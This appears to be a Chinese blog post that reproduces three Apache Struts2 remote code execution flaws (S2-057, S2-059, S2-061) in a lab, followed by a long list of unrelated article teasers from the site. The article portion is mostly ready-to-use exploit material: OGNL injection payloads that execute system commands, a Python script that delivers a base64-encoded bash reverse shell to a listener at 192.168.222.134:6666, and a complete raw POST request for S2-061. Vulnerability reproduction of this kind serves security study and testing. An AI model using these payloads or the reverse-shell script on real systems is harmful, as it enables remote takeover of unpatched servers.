Struts2遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)編碼

0x00 Struts2 簡介

Struts2 是 Apache 軟件組織推出的一個(gè)相當(dāng)強(qiáng)大的 Java Web 開源框架，本質(zhì)上相當(dāng)于一個(gè) servlet。Struts2 基于 MVC 架構(gòu)，框架結(jié)構(gòu)清晰。通常作為控制器（Controller）來建立模型與視圖的數(shù)據(jù)交互，用于創(chuàng)建企業(yè)級(jí) Java web 應(yīng)用程序。該框架多版本存在遠(yuǎn)程代碼執(zhí)行，

0x01 Struts2 (CVE-2018-11776)

Struts2 S2-057

payload：/struts2-showcase/$%7B233*233%7D/actionChain1.action

驗(yàn)證漏洞存在：

paylaod：ls：查看目錄下文件，paylaod需要進(jìn)行url編碼
${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

0x02 Struts2 (CVE-2019-0230)

Struts2 S2-059

漏洞驗(yàn)證paylaod：/?id=%25{2*5}

反彈shell：paylaod：使用python3環(huán)境，運(yùn)行前查看環(huán)境執(zhí)行是否正常

反彈paylaod：bash -i >& /dev/tcp/192.168.222.134/6666 0>&1
需要base64加密放入下paylaod
import requests
url = "http://192.168.222.134:8080"
data1 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
}
data2 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyMi4xMzQvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}'))}"
}
res1 = requests.post(url, data=data1)
res2 = requests.post(url, data=data2)
print(123)

?執(zhí)行腳本

shell接收成功：

0x03 Struts2 (CVE-2020-17530)

Struts2 S2-061

POC：post請(qǐng)求：
POST / HTTP/1.1
Host: 192.168.222.134:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=node016yd6hhrzkka19x0sws5e7i9g1.node0
If-None-Match: W/"187-1504645830000"
If-Modified-Since: Tue, 05 Sep 2017 2130 GMT
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Connection: close
Content-Length: 829


------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"


%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("id")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

0x04 strust2 命令執(zhí)行檢測工具

github：https://github.com/HatBoy/Struts2-Scan
現(xiàn)支持部分序號(hào)的st2檢測：s2-053之前，測試過程還是出現(xiàn)了很多問題，實(shí)戰(zhàn)中建議使用單獨(dú)的對(duì)應(yīng)exp檢測

編輯：黃飛

閱讀全文

控制器(191060) 控制器(191060)
JAVA(115965) JAVA(115965)

評(píng)論

小米路由器任意文件讀取及遠(yuǎn)程命令執(zhí)行漏洞解析

存在任意文件讀取漏洞和遠(yuǎn)程命令執(zhí)行漏洞，攻擊者通過該漏洞可以獲取服務(wù)器權(quán)限，導(dǎo)致服務(wù)器失陷。二、漏洞復(fù)現(xiàn) 系統(tǒng)首頁地址及頁面顯示如下 ? ?http://xx.xx.xx.xx/cgi-bin

2023-03-01 15:09:17

5107

Struts框架技術(shù)在J2EE中的研究和應(yīng)用

Struts框架技術(shù)在J2EE中的研究和應(yīng)用J2EE簡介J2EE是一個(gè)開放的、基于標(biāo)準(zhǔn)的平臺(tái)，可以開發(fā)、部署和管理N層結(jié)構(gòu)的、面向Web的、以服務(wù)器為中心的企業(yè)級(jí)應(yīng)用，它是利用Java 2 平臺(tái)來

2009-11-13 22:07:17

遠(yuǎn)程執(zhí)行后臺(tái)程序問題

大佬們，我linux ssh遠(yuǎn)程后臺(tái)執(zhí)行一個(gè)jar 退出終端程序就掉了，使用的命令是nohup java路徑 -jar jar程序 &退出終端后仍然程序掛掉。使用nohup java路徑

2020-11-11 15:59:59

DM368 MP3編碼及程序遠(yuǎn)程升級(jí)問題

MP3編碼器好?? ??????? 還有一個(gè)問題:請(qǐng)問專家,appro 的 SDK有沒有遠(yuǎn)程升級(jí)內(nèi)核/文件系統(tǒng)的功能? ?????? 謝謝 [td][td][/tr][tr]

2018-05-31 04:55:55

M031如何執(zhí)行USB設(shè)備遠(yuǎn)程喚醒功能

應(yīng)用程序: 演示如何執(zhí)行 USB 設(shè)備遠(yuǎn)程喚醒功能。 BSP 版本: M031系列 BSP CMSIS V3.01.000 硬件: NuMaker-M032SE V1.3 此示例代碼包含 USB

2023-08-30 08:51:17

[下載]Struts2+Hibernate3整合項(xiàng)目視頻下載（不定期更新）

關(guān)系。 整體視頻大綱： 視頻是完全真實(shí)課堂錄制，視頻主要內(nèi)容包括：1：Struts2和Hibernate3在實(shí)際項(xiàng)目開發(fā)中的使用2：自定義泛型、反射、注解、枚舉等技術(shù)在

2010-04-26 10:13:20

[下載]Struts2+Hibernate3整合項(xiàng)目視頻（新版的增刪改查）

Struts2+Hibernate3整合項(xiàng)目視頻（新版的增刪改查） 1、應(yīng)用通用的DAO 2、真實(shí)值/表現(xiàn)值的轉(zhuǎn)換  在

2010-03-17 14:53:41

[轉(zhuǎn)帖]學(xué)JAVA需要掌握的技術(shù)及流程

分頁、Web樹、Javascript在Web開發(fā)中的應(yīng)用、常見的一些Web控件等等。 14.Struts2框架  完整的學(xué)習(xí)Struts2框架

2010-05-14 13:19:24

codewarrior代碼不執(zhí)行

mc9s08dz60芯片，使用codewarrior編寫代碼時(shí)，使用了TMP1和TMP2兩個(gè)定時(shí)器，如果使TMP1一直執(zhí)行，TMP2中有部分代碼不執(zhí)行。如果不初始化TMP1，TMP2中所有代碼可以正常執(zhí)行。

2015-07-17 16:59:26

分析嵌入式軟件代碼的漏洞-代碼注入

進(jìn)行編譯在大多數(shù)情況下，程序故意像執(zhí)行代碼一樣執(zhí)行數(shù)據(jù)是不尋常的，但將數(shù)據(jù)用于構(gòu)造有意執(zhí)行的對(duì)象卻很常見。 1、格式化字符串漏洞大多數(shù)C程序員熟悉printf函數(shù)。大體上，這些格式字符串

2025-12-22 12:53:41

北大青鳥的struts課件下載

北大青鳥的struts課件下載北大青鳥的structs課件內(nèi)容有掌握Struts的控制器組件掌握Struts的視圖標(biāo)簽運(yùn)用Struts的Validator框架理解Struts的MVC原理理解JSF

2008-12-08 11:13:54

國產(chǎn)智能掃地機(jī)器人被曝存在安全漏洞，易隱私泄露

　　導(dǎo)讀：安全研究人員發(fā)現(xiàn)智能機(jī)器人存在兩個(gè)安全漏洞，導(dǎo)致其容易受到攻擊。第一個(gè)漏洞可以讓黑客對(duì)設(shè)備擁有超級(jí)用戶權(quán)限，可以遠(yuǎn)程控制它們?cè)诩依镞\(yùn)動(dòng)，這有點(diǎn)令人毛骨悚然。第二個(gè)漏洞允許黑客查看攝像機(jī)拍攝

2018-07-27 09:29:19

基于樹莓派2 blacktrack的系統(tǒng)漏洞掃描

本帖最后由 weizhizhou 于 2017-4-30 00:06 編輯基于樹莓派2 blacktrack的系統(tǒng)漏洞掃描對(duì)Linux系統(tǒng)開發(fā)有5年了，近期在blackberry2上移植把玩

2017-04-29 09:59:05

如何執(zhí)行USB設(shè)備遠(yuǎn)程喚醒功能

應(yīng)用程序: 演示如何執(zhí)行 USB 設(shè)備遠(yuǎn)程喚醒功能。 BSP 版本: M031系列 BSP CMSIS V3.01.000 硬件: NuMaker-M032SE V1.3 此示例代碼包含 USB

2023-08-23 07:13:40

嵌入式代碼可能存在的致命漏洞是什么

關(guān)注+星標(biāo)公眾號(hào)，不錯(cuò)過精彩內(nèi)容來源 |電子伊甸園微信公眾號(hào)|嵌入式專欄隨著互聯(lián)網(wǎng)的發(fā)展，嵌入式設(shè)備正分布在一個(gè)充滿可以被攻擊者利用的源代碼級(jí)安全漏洞的環(huán)境中。因此，嵌入式軟件開發(fā)...

2021-12-17 07:59:40

影響 Linux 系統(tǒng)安全基石的 glibc 嚴(yán)重漏洞

編者按：這個(gè)消息是幾個(gè)月前曝出的，也許我們?cè)搶?duì)基礎(chǔ)軟件的安全問題更加重視。谷歌披露的一個(gè)嚴(yán)重漏洞影響到了主流的 Linux 發(fā)行版。glibc 的漏洞可能導(dǎo)致遠(yuǎn)程代碼執(zhí)行。幾個(gè)月前，Linux 用戶

2016-06-25 10:01:50

源代碼審計(jì)怎么做？有哪些常用工具

地匹配、查找。 2、Checkmax：通過虛擬編譯器自動(dòng)對(duì)軟件源代碼分析，并建立了代碼元素及代碼元素之間關(guān)系的邏輯圖。然后對(duì)這個(gè)內(nèi)部代碼圖進(jìn)行查詢，包含已知安全漏洞和質(zhì)量缺陷問題預(yù)先設(shè)定好的查詢列表

2024-01-17 09:35:47

用于緩解高速緩存推測漏洞的固件接口

CVE-2017-5715，也稱為Spectre Variant 2，是某些ARM CPU設(shè)計(jì)中的漏洞，允許攻擊者控制受害者執(zhí)行上下文中的推測執(zhí)行流，并泄露攻擊者在體系結(jié)構(gòu)上無法訪問的數(shù)據(jù)。在

2023-08-25 07:36:27

請(qǐng)問遠(yuǎn)程執(zhí)行IC驗(yàn)證是怎么實(shí)現(xiàn)的？

請(qǐng)問遠(yuǎn)程執(zhí)行IC驗(yàn)證是怎么實(shí)現(xiàn)的？

2021-06-17 10:27:33

請(qǐng)問如何在STMIDE中執(zhí)行編碼標(biāo)準(zhǔn)？

有沒有辦法通過一些文本突出顯示在 STMIDE 中強(qiáng)制執(zhí)行編碼標(biāo)準(zhǔn)？即：“函數(shù)名稱應(yīng)為 Function_Name()”等。在這種情況下，STM 對(duì)其生成的庫使用什么規(guī)則？有人為此推薦一些插件嗎？其他人在編寫代碼時(shí)試圖遵循哪些標(biāo)準(zhǔn)？

2023-01-12 06:53:25

深入淺出Struts 2 (中文PDF版)

深入淺出Struts 2Struts2 是Struts的下一代產(chǎn)品。而最初提案Struts Ti所設(shè)想的發(fā)展方向，在Struts的現(xiàn)有代碼的基礎(chǔ)上是很難完成的。在發(fā)起提案的時(shí)候，Patrick Lightbody把多個(gè)不同的Web框

2008-10-29 14:17:37

Struts快速學(xué)習(xí)指南-pdf

Struts快速學(xué)習(xí)指南:Struts 是一個(gè)技術(shù)框架，由Craig R. McClanahan編寫，并且在2000 年的時(shí)候捐獻(xiàn)給了ASF，目前，有很多組織和個(gè)人參與Struts 框架的開發(fā)，使得Struts保持高速成長，同時(shí)

2008-12-08 10:32:50

北大青鳥struts課件下載

北大青鳥struts課件:理解JSF的體系結(jié)構(gòu),掌握J(rèn)SF應(yīng)用程序的開發(fā)步驟,掌握J(rèn)SF應(yīng)用的導(dǎo)航規(guī)則,熟練掌握J(rèn)SF應(yīng)用的標(biāo)簽庫,掌握Struts的控制器組件,掌握Struts的視圖標(biāo)簽,運(yùn)用Struts的Validator

2008-12-08 10:59:04

Struts技術(shù)簡介

Struts 框架是最重要的組件，它通過使用Servlet org.apache.struts.action.ActionServlet 來實(shí)現(xiàn)struts-config.xml的配置信息，把請(qǐng)求轉(zhuǎn)發(fā)給適當(dāng)?shù)腁ction對(duì)象不存在，ActionServlet會(huì)先創(chuàng)建這個(gè)對(duì)象Actio

2008-12-08 11:01:10

Struts控制器組件

Web 應(yīng)用程序是許多單獨(dú)組件的集合Struts 實(shí)現(xiàn)了模型-視圖-控制器Struts框架實(shí)現(xiàn)的只是MVC的視圖和控制器組件Struts 的備選框架JSF、Springstruts-config.xml 文件告訴 ActionServlet

2008-12-08 11:02:15

Struts視圖組件

Struts視圖組件控制器是應(yīng)用程序中的訪問中心點(diǎn)ActionServlet 從 Struts 配置文件中讀取數(shù)據(jù)并初始化 Struts 應(yīng)用程序的配置RequestProcessor 類處理請(qǐng)求的所有特性，所有請(qǐng)求都是在

2008-12-08 11:03:07

基于Struts框架和Procedure的Web開發(fā)模式

介紹基于MVC設(shè)計(jì)模式的Struts框架的組成和實(shí)現(xiàn)原理，總結(jié)該開發(fā)框架的應(yīng)用特點(diǎn)和開發(fā)步驟。在分析和比較其他基于Struts開發(fā)模式特點(diǎn)的基礎(chǔ)上，提出基于Struts和存儲(chǔ)過程結(jié)合的Web

2009-04-23 10:16:20

漢明糾錯(cuò)編碼器實(shí)例（VHDL源代碼）

漢明糾錯(cuò)嗎編碼器實(shí)例（VHDL源代碼）:

2009-05-27 10:11:15

基于Struts2企業(yè)級(jí)異常處理研究及擴(kuò)展

傳統(tǒng)的Java異常-捕獲機(jī)制已不能滿足當(dāng)今大型企業(yè)級(jí)開發(fā)的要求。本文對(duì)Struts2提供的異常處理機(jī)制進(jìn)行了研究和擴(kuò)展，提出將檢查型（Checked）異常轉(zhuǎn)化為非檢查型（Unchecked）異常

2009-06-18 08:19:24

基于Struts框架構(gòu)建績效考核管理系統(tǒng)

績效考核管理系統(tǒng)是企業(yè)對(duì)員工績效進(jìn)行量化考核的手段。首先分析了構(gòu)建系統(tǒng)的目的，然后對(duì)基于MVC設(shè)計(jì)模式的struts框架進(jìn)行了介紹，通過舉例具體闡明了在采用struts框架進(jìn)行開

2009-08-12 10:00:41

基于Struts和Hibernate的Web應(yīng)用的構(gòu)建

本文介紹了 MVC 模式與兩個(gè)開源框架：Struts 和Hibernate，提出了基于這兩種框架的Web 應(yīng)用的模型，并就Struts 和Hibernate 在模型中的工作流程給出了較為詳細(xì)的闡述，最后對(duì)模型的

2009-08-29 10:30:03

Struts及其在糧食倉儲(chǔ)系統(tǒng)中的應(yīng)用

文中介紹了一種利用Struts 結(jié)構(gòu)化應(yīng)用程序的方法，并結(jié)合項(xiàng)目中的實(shí)際應(yīng)用，談了些作者的心得體會(huì)。關(guān)鍵詞：J2EE；MVC；Struts；JSP；Servlet

2009-09-09 08:10:09

基于Hibernate與Struts框架的物流管理系統(tǒng)的實(shí)現(xiàn)

基于使用單一框架構(gòu)建企業(yè)級(jí)應(yīng)用時(shí)存在拓展性差，結(jié)構(gòu)復(fù)雜的問題，給出使用Struts 結(jié)合Hibernate 開源框架進(jìn)行整合開發(fā)的實(shí)例，同時(shí)探討如何配置和靈活應(yīng)用Struts和Hibernate 框架

2009-09-12 16:22:02

基于Struts和Hibernate框架的Web應(yīng)用的設(shè)計(jì)與

基于J2EE 平臺(tái)的框架技術(shù)是目前開發(fā)Web 應(yīng)用的主流技術(shù)。其中，Struts 框架基于MVC 設(shè)計(jì)模式，清晰地劃分了控制部分、業(yè)務(wù)邏輯和視圖，實(shí)現(xiàn)了各層之間的解耦；而Hibernate 對(duì)JDBC 提供

2009-09-14 16:21:31

EZW編碼器源代碼

2010-02-09 15:21:03

Struts編程源代碼

Struts編程源代碼部分代碼如下: %@ taglib uri="/WEB-INF/struts-bean.tld" prefix="bean" %><%@ taglib uri="/WEB-INF/struts-logic.tld" prefix="logic" %>&l

2010-03-31 14:32:08

Struts2 極速表單驗(yàn)證框架使用說明書

1 Struts2 極速表單驗(yàn)證框架使用說明書.12 Struts 2 極速表單驗(yàn)證框架簡介.23 項(xiàng)目許可.34 下載本項(xiàng)目.35 演示應(yīng)用.46 整合步驟step by step 87 驗(yàn)證規(guī)則表達(dá)式詳解.128 和R

2010-09-18 08:27:05

struts實(shí)現(xiàn)多圖片上傳

package　com.ninetowns.zhangc.struts.action;public　class　Constant　{ 　 private　Constant

2010-12-27 17:28:44

基于Struts框架的科技管理系統(tǒng)的設(shè)計(jì)

在總結(jié)傳統(tǒng)B/S架構(gòu)的科技管理系統(tǒng)存在的許多弊端的基礎(chǔ)上，探討Struts框架的體系結(jié)構(gòu)及實(shí)現(xiàn)MVC設(shè)計(jì)模式的機(jī)制，詳細(xì)分析科技管理系統(tǒng)的主要功能，并利用Struts框架和Java語言對(duì)該

2010-12-29 17:30:29

#硬聲創(chuàng)作季 Spring視頻教程從入門到精通：09SSH整合-版本1-搭建struts2的開發(fā)環(huán)境并測試

springStruts系統(tǒng)架構(gòu)

Mr_haohao發(fā)布于 2022-10-03 13:48:33

#硬聲創(chuàng)作季 Spring視頻教程從入門到精通：13SSH整合-版本1-拷貝struts2整合spring的

springStruts系統(tǒng)架構(gòu)

Mr_haohao發(fā)布于 2022-10-03 13:51:45

Struts中文手冊(cè)下載

經(jīng)過了兩個(gè)星期不懈努力，今天終于完成了對(duì)strtus整體架構(gòu)及核心標(biāo)簽庫的介紹。從幾乎不懂struts和HTML標(biāo)簽，到可以給別人解決涉及struts的一些小問題，這與朋友的幫助和我的努力是分不開的，但我更希望它能給那些想要學(xué)的，正在學(xué)的和已經(jīng)學(xué)過的人帶來不同

2011-02-28 14:39:51

MPEG-2壓縮編碼器原理

MPEG - 2 壓縮編碼器是將模擬電視視音頻信號(hào)進(jìn)行MPEG - 2壓縮編碼輸出實(shí)時(shí)TS流的前端設(shè)備,適用于數(shù)字電視的傳輸或前端信源編碼以及會(huì)議電視、遠(yuǎn)程教育等各種應(yīng)用

2011-03-15 11:03:42

5435

Struts In Action使用領(lǐng)先的Java框架構(gòu)建Web應(yīng)用

歡迎你閱讀《Struts In Action》。本書的目的是幫助Web應(yīng)用開發(fā)者能夠最好的使用Struts web應(yīng)用框架。 Struts是一個(gè)開源軟件，有助于開發(fā)者更加快速和容易地建立 Web 應(yīng)用程序。Struts依靠絕

2011-04-14 20:17:50

Struts2和Ibatis在畢業(yè)答辯管理系統(tǒng)中的應(yīng)用

在深入分析Struts2和Ibatis基礎(chǔ)上,構(gòu)建了兩框架的整合方案。文中以畢業(yè)答辯管理系統(tǒng)設(shè)計(jì)與實(shí)現(xiàn)為例,介紹其在實(shí)際開發(fā)過程中的應(yīng)用。

2011-10-17 16:41:47

Struts2 V3.0入門

Struts 2是Struts的下一代產(chǎn)品，是在 struts 和WebWork的技術(shù)基礎(chǔ)上進(jìn)行了合并的全新的Struts 2框架。其全新的Struts 2的體系結(jié)構(gòu)與Struts 1的體系結(jié)構(gòu)的差別巨大。Struts 2以WebWork為核心，采用攔

2011-12-06 10:46:29

J2EE基于Struts和Hibernate框架的新聞發(fā)布系統(tǒng)分析

以J2EE為基礎(chǔ)，對(duì)Struts和Hibernate框架分別進(jìn)行深入剖析，研究分析二者的整合集成技術(shù)，并對(duì)開發(fā)所使用的MVC設(shè)計(jì)模式和MySQL數(shù)據(jù)庫簡要介紹。通過引入新聞系統(tǒng)實(shí)例討論了Struts框架對(duì)系

2012-08-29 14:51:35

Struts2源代碼分析

Struts2源代碼分析。

2015-11-06 10:06:50

FPGA卷積編碼1/2碼率

這是verilog寫的可以實(shí)現(xiàn)卷積編碼1/2碼率的代碼，附帶測試文件0

2016-01-20 18:23:39

遠(yuǎn)程桌面軟件代碼—lookmypc遠(yuǎn)程桌面軟件代碼

遠(yuǎn)程桌面軟件代碼—lookmypc遠(yuǎn)程桌面軟件代碼，主要提供給程序員進(jìn)行二次開發(fā)使用，因此只提供了基本的演示功能，不能實(shí)現(xiàn)自啟動(dòng)，連接時(shí)需要人工點(diǎn)擊確認(rèn)，不能實(shí)現(xiàn)隱蔽監(jiān)控等，程序員可以根據(jù)提供的代碼和接口，實(shí)現(xiàn)更多，更復(fù)雜的功能。

2016-05-11 11:30:19

h264編碼解碼源代碼

h264編碼解碼源代碼h264編碼解碼源代碼

2017-01-14 15:50:23

結(jié)合靜態(tài)分析與動(dòng)態(tài)符號(hào)執(zhí)行的軟件漏洞檢測方法

動(dòng)態(tài)符號(hào)執(zhí)行是近年來新興的一種軟件漏洞檢測方法，它可以為目標(biāo)程序的不同執(zhí)行路徑自動(dòng)生成測試用例，從而獲得較高的測試代碼覆蓋率。然而，程序的執(zhí)行路徑很多，且大部分路徑都是漏洞無關(guān)的，通常那些包含危險(xiǎn)

2017-11-23 15:01:36

蘋果最新 MacOS 安全更新包中含有針對(duì) USB 代碼執(zhí)行漏洞的補(bǔ)丁

蘋果公司最新的 MacOS 安全更新包中包含了針對(duì) USB 代碼執(zhí)行漏洞的補(bǔ)丁。這個(gè)漏洞存在于 fsck_msods 工具之中。fsck_msods是一個(gè)系統(tǒng)工具，它可以用來檢測并修復(fù) FAT

2017-11-27 06:34:37

555

基于符號(hào)執(zhí)行技術(shù)實(shí)現(xiàn)的驅(qū)動(dòng)程序的漏洞檢測

研究表明，驅(qū)動(dòng)程序的漏洞是造成Linux系統(tǒng)安全問題的主要原因之一，可引發(fā)提權(quán)、拒絕服務(wù)等高危情況。針對(duì)無具體設(shè)備的情況下，無法對(duì)驅(qū)動(dòng)程序進(jìn)行運(yùn)行時(shí)漏洞檢測的問題，提出了對(duì)驅(qū)動(dòng)程序進(jìn)行符號(hào)化執(zhí)行

2017-12-05 16:06:01

基于動(dòng)態(tài)污點(diǎn)分析的DOM XSS漏洞檢測算法

腳本引擎，利用動(dòng)態(tài)的、基于bytecode的污點(diǎn)分析方法實(shí)現(xiàn)了DOM XSS漏洞的檢測。對(duì)DOM對(duì)象類屬性的擴(kuò)展和SpiderMonkey字符串編碼格式的修改可以完成污點(diǎn)數(shù)據(jù)標(biāo)記；遍歷

2017-12-18 16:01:44

精準(zhǔn)執(zhí)行可達(dá)性分析

可達(dá)性分析在定向測試、靜態(tài)分析結(jié)果核驗(yàn)、錯(cuò)誤復(fù)現(xiàn)和漏洞POC構(gòu)造等領(lǐng)域均有廣泛應(yīng)用．本文對(duì)近年來國內(nèi)外學(xué)者在該研究領(lǐng)域取得的相關(guān)研究成果進(jìn)行了系統(tǒng)的分析、提煉和總結(jié)．首先，指出了精準(zhǔn)執(zhí)行可達(dá)性分析對(duì)應(yīng)的約束求

2017-12-19 15:42:16

ssi框架快速搭建

ssi的框架主要是由struts2，spring以及ibatis組成，他們負(fù)責(zé)各層之間的交互與協(xié)作，從而實(shí)現(xiàn)整個(gè)web端的功能實(shí)現(xiàn)與整合。Struts目前主要負(fù)責(zé)數(shù)據(jù)傳遞和控制方面，spring則依靠其強(qiáng)大的依賴注入技術(shù)實(shí)現(xiàn)了類似bean托管和整合等功能

2017-12-27 13:50:57

4229

AMD回應(yīng)Spectre漏洞更新：將提供微代碼更新盡快修復(fù)舊平臺(tái)變磚問題

Spectre漏洞是近段時(shí)間大家比較關(guān)注的問題，據(jù)悉，AMD就舊平臺(tái)變磚問題問題將會(huì)在本周提供Spectre漏洞的微代碼更新。AMD表示已經(jīng)分發(fā)給左右主板廠商。

2018-01-12 15:25:07

1173

360發(fā)現(xiàn)區(qū)塊鏈平臺(tái)EOS的一系列高危安全漏洞，安全問題不容忽視

360安全衛(wèi)士于2018年5月29日下午在微博上發(fā)布公告稱，360Vulcan（伏爾甘）團(tuán)隊(duì)發(fā)現(xiàn)了區(qū)塊鏈平臺(tái)EOS的一系列高危安全漏洞。經(jīng)驗(yàn)證，其中部分漏洞可以在EOS節(jié)點(diǎn)上遠(yuǎn)程執(zhí)行任意代碼，即可以通過遠(yuǎn)程攻擊，直接控制和接管EOS上運(yùn)行的所有節(jié)點(diǎn)。

2018-07-03 10:50:00

1476

微軟Windows Defender出現(xiàn)漏洞攻擊者可利用漏洞對(duì)計(jì)算機(jī)進(jìn)行控制

最近安全人員發(fā)現(xiàn)了一個(gè)Windows Defender漏洞，這個(gè)漏洞是一個(gè)遠(yuǎn)程代碼執(zhí)行漏洞，通過追溯微軟自己使用的開源歸檔工具發(fā)現(xiàn)的。攻擊者可以利用這個(gè)漏洞在計(jì)算機(jī)上執(zhí)行遠(yuǎn)程代碼操作，甚至可以自己執(zhí)行下載文件的操作。

2018-06-07 01:27:00

1314

施耐德電氣軟件存在遠(yuǎn)程代碼執(zhí)行漏洞

這兩款軟件可以幫助人們對(duì)機(jī)器進(jìn)行編程并確保關(guān)鍵基礎(chǔ)設(shè)施的順利運(yùn)作，它們分別是：工具集 InduSoft Web Studio——旨在開發(fā)人機(jī)接口 (HMI)、監(jiān)視控制和數(shù)據(jù)采集 (SCADA) 系統(tǒng)以及嵌入式工具解決方案。InTouch Machine Edition——HMI/SCADA 開發(fā)工具，可用于高階應(yīng)用以及小型嵌入式設(shè)備。

2018-05-09 11:45:37

5818

360發(fā)現(xiàn)區(qū)塊鏈EOS安全漏洞其足以轟癱數(shù)字體系

近日，360公司Vulcan（伏爾甘）團(tuán)隊(duì)發(fā)現(xiàn)了區(qū)塊鏈平臺(tái)EOS的一系列高危安全漏洞。經(jīng)驗(yàn)證，其中部分漏洞可以在EOS節(jié)點(diǎn)上遠(yuǎn)程執(zhí)行任意代碼，即可以通過遠(yuǎn)程攻擊，直接控制和接管EOS上運(yùn)行的所有節(jié)點(diǎn)。

2018-06-07 07:35:00

903

瑞士工業(yè)技術(shù)公司ABB的門禁通信系統(tǒng)中存在多個(gè)嚴(yán)重漏洞

研究人員發(fā)現(xiàn)的其中一個(gè)漏洞為遠(yuǎn)程代碼注入漏洞，允許訪問本地網(wǎng)絡(luò)的攻擊者控制目標(biāo)設(shè)備。該漏洞影響本地配置 Web 服務(wù)器，攻擊者可向系統(tǒng)發(fā)送特制的信息利用該漏洞。

2018-06-14 11:55:57

5644

Oracle發(fā)布季度補(bǔ)丁更新修復(fù)遠(yuǎn)程代碼執(zhí)行漏洞

2018年7月18日，美國甲骨文（Oracle）公司官方發(fā)布了季度補(bǔ)丁更新，其中修復(fù)了一個(gè) Oracle WebLogic Server 遠(yuǎn)程代碼執(zhí)行漏洞 CVE-2018-2893，此漏洞是對(duì)編號(hào)為 CVE-2018-2628 修復(fù)的繞過，攻擊者同樣可以在未身份驗(yàn)證的情況下對(duì) WebLogic 進(jìn)行攻擊。

2018-07-27 15:45:07

3452

博思艾倫獲10億美元合同，成美國政府最大網(wǎng)絡(luò)安全提供商

2018年8月22日，Struts2 官方公布最新的 Struts2 遠(yuǎn)程代碼執(zhí)行漏洞 S2-057，CVE-2018-11776，當(dāng)在 struts2 開發(fā)框架中使用泛 namespace 功能的時(shí)候，并且使用特定的 result 可能產(chǎn)生遠(yuǎn)程代碼執(zhí)行漏洞。存在高危風(fēng)險(xiǎn)。

2018-08-24 14:34:12

5809

遠(yuǎn)程代碼執(zhí)行漏洞現(xiàn)身運(yùn)行內(nèi)嵌式系統(tǒng)的流行操作系統(tǒng)

在主要用于智能家居及關(guān)鍵基礎(chǔ)設(shè)施系統(tǒng)中的大部分微處理器與單片機(jī)的開源操作系統(tǒng)FreeRTOS中，已發(fā)現(xiàn)13個(gè)漏洞，其中三分之一可用來執(zhí)行遠(yuǎn)程代碼。

2018-10-28 09:30:45

4080

CVE漏洞—PHPCMS2008 /type.php代碼注入高危漏洞預(yù)警

webshell指令，在服務(wù)器上執(zhí)行任意代碼，因此該代碼注入漏洞的影響較大。安全建議手動(dòng)修復(fù)臨時(shí)解決可以在/type.php文件中對(duì)template變量進(jìn)行過濾，避免用戶輸入的含有"("、"{"等符號(hào)的內(nèi)容混入

2018-12-07 16:18:53

599

Adobe發(fā)布安全更新，修復(fù)了Adobe Acrobat與Reader中多個(gè)關(guān)鍵安全漏洞

據(jù)悉，在這87個(gè)漏洞中，共有39個(gè)高危漏洞，這將允許攻擊者在受感染計(jì)算機(jī)上執(zhí)行代碼或提升權(quán)限。代碼執(zhí)行漏洞可允許攻擊者在受感染計(jì)算機(jī)上執(zhí)行命令，而特權(quán)提升漏洞可允許攻擊者以更高的權(quán)限等級(jí)執(zhí)行命令

2018-12-14 14:25:32

3235

ThinkPHP5.0.遠(yuǎn)程代碼執(zhí)行漏洞預(yù)警

Thinkphp5.0.*存在遠(yuǎn)程代碼執(zhí)行漏洞。攻擊者可以利用漏洞實(shí)現(xiàn)任意代碼執(zhí)行等高危操作。

2019-01-26 16:26:00

3966

maccms網(wǎng)站受到網(wǎng)絡(luò)攻擊源于SQL注入遠(yuǎn)程代碼漏洞

目前蘋果CMS官方在不斷的升級(jí)補(bǔ)丁，官方最新的漏洞補(bǔ)丁對(duì)于目前爆發(fā)的新漏洞沒有任何效果。

2020-01-14 15:30:15

1034

RCE漏洞具有17年歷史，影響了數(shù)個(gè)Linux系統(tǒng)

